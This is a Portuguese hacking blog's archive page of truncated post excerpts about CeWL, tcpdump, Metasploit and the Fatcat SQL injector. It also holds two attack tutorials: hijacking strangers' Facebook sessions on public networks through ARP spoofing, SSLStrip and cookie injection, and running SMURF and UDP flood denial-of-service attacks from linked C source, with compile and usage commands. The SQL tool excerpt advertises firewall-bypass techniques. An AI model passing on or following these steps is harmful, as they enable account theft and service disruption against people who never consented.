Pular para o conteúdo principal

Postagens

Mostrando postagens de 2014

CeWL - Gerador de lista personalizada de palavras - Gerador de Word List

Com base em uma discussão sobre PaulDotCom sobre a criação de listas de palavras personalizada por spidering um site metas e coleta palavras únicas, decidi escrever CeWL, o gerador de lista personalizada de palavras. CeWL é um app ruby que aranhas um determinado url a uma profundidade especificado, opcionalmente, seguindo os links externos, e retorna uma lista de palavras que podem ser usadas para crackers de senhas, como John the Ripper . CeWL também tem um aplicativo de linha de comando associado, FAB (arquivos já ensacado), que usa as mesmas técnicas de extração de dados de meta para criar listas de autor / criador, já baixou. Change Log Versão 5.1 Adicionado a licença GPL-3 + para permitir a inclusão no Debian. Adicionado um Gemfile para fazer a instalação de pedras preciosas mais fácil. Versão 5.0 Adiciona suporte a proxy a partir da linha de comando e a capacidade de passar credenciais para tanto básica e autenticação Digest. O uso é simples, veja a ajuda ( help ) para mais

tcpdump: análise segura de rede!

Análise de tráfego de rede O tcpdump é um analisador de tráfego (sniffer) de rede em modo texto mais famoso que existe, utiliza a biblioteca libpcap e facilita a vida dos administradores de rede nos problemas do dia-a-dia. Modo texto?  Por quê diabos tenho que ficar decifrando texto puro se o Wireshark  já faz a análise e exibe os dados organizados pra mim? Primeiro, como já dito, o Wireshark "tenta" capturar todos os pacotes de rede, porém ele é instável em tempo real, dando pau e fechando sem motivo nenhum durante algumas coletas. Segundo, funciona basicamente na interface gráfica. Muitas vezes temos só um terminal para realizar tal captura de pacotes. Terceiro, ele é  vulnerável . Isso mesmo, no  próprio site da ferramenta  temos alguns exemplos de vulnerabilidades corrijidas e no  SecurityFocus  selecionando o Wireshark no campo Vendors, podemos ver outras coisinhas interessantes. E quarto, não se desespere, podemos gerar arquivos de texto com o tcpdump e visualizá-l

Hackeando Facebook com Wireshark e Cookie Injector

Achei esse tuto legal e funcional e resolvi postar aqui no blog. Primeiramente você vai precisar estar na mesma rede que seu alvo. Se você não tem um alvo específico, qualquer rede pública serve. Vamos precisar de: Uma distro Linux para facilitar Windows qualquer (não sei se foi o chrome ou se foi o mac mas não funcionou no mac) SSLStrip Wireshark Arpspoof Greasemonkey Cookie injector para Greasemonkey Firefox ou Iceweasel Bastante coisa, não é um tuto muito fácil. Mas depois de um tempo de prática você vê que também não é tão difícil. Primeiramente baixe tudo o que você não tem. Se você usa Back Track ou Kali, falta apenas o Greasemonkey e o Cookie Injector, com algumas buscas no google você encontra... Vamos ao tuto então! Primeiro de tudo temos que ativar o encaminhamento dos pacotes. Para isso basta digitar o comando abaixo:   echo 1 > /proc/sys/net/ipv4/ip_forwarding O próximo passo é criar uma regra no  iptables  para redirecionar todo o trá

Tutorial – Realizando ataque SMURF e UDP Flood

Para prosseguirmos precisamos de 3 coisas: —> broadcast.txt (Uma lista com centenas de Ips) (Pequeno exemplo de lista de  broadcast.txt  http://pastebin.com/UeKr5MGJ ) —> smurf.c  http://pastebin.com/aR38M93S —> udp_flooder.c  http://pastebin.com/wGkK495H |=====================================| | Primeiros passos | |=====================================| Depois de baixar as ferramentas nós temos que compila-las. Compilando o smurf.c: # sudo gcc smurf.c -o smurf # Compilando o udp_flooder.c: # sudo gcc udp_flooder.c -o udp_flooder # |=====================================| | Preparando o ataque com Smurf | |=====================================| Para continuar daqui pra frente você precisa se tornar root no konsole. Executando o smurf: # ./smurf usage: ./smurf <target> <bcast file> <num packets> <packet delay> <packet size> target = endereço para atacar bcast file = arquivo

Tutorial detalhado em guia prático do Metasploit – Copiado.

O tutorial abaixo é uma cópia exata do site portugual-a-programar e em minhão opinião é um dos melhores para língua portuguesa. O original poderá ser acessado no seguinte  link . Nenhuma palavra ou vírgula foi alterada do original, restando somente o meu apoio e parabéns quanto ao excelente trabalho feito pelo  herakty  , autor deste excelente tutorial. Vale lembrar que este tutorial está em português de Portugal. O Metasploit é um framework criado por H.D.Moore, que serve para elaboração e execução de um repositório de exploits. Os meus maiores agradecimentos ao H.D. Moore e sua equipe por tornarem um sonho realidade Agora que todos já sabem o que é o Metasploit, vamos aprender a trabalhar com ele. Lembrando que este tutorial só tem o objectivo de aprendizagem, cada um é responsável pelos seus actos. De qualquer forma, e devido a certos requesitos dos testes de intrusão deverão usar sempre proxy a não ser que usem um Lab com VM´s Uma das coisas que hoje já existe no metas

Fatcat V2 Auto [S] ql-Injector

Fatcat é open source aplicação web ferramenta caneta testador disponível gratuitamente para download.Injeção SQL Fatcat é desenvolvido para reduzir os processos de exploração, enquanto vulnerabilidade de injeção SQL e explorando injeção SQL profundamente. Características de Fatcat V2 Ele suporta injeção SQL normais Suporta baseado erro de injeção SQL WAF (Web Application Firewall) manual. C-Style Mysql comentar WAF Bypass Buffer overflow WAF Bypass CRLF WAF Bypass Bypass com Information_schema.statics Bypass com Information_schema.key_column_usage Sua execução no servidor amplamente utilizado que é Linux, Win, Max OS Ele suporta MySQL 5.0 Snap shot de FatCat SQL Injector Para executar essa ferramenta, por favor fornecer testes de URL, parâmetro (URL vulnerável), contagem de Max coluna e selecione typ injeção. Se você deseja ignorar WAF selecionar qualquer um dos da lista. SQL breve injeção Injeção de SQL é uma das vulnerabilidades mais comuns em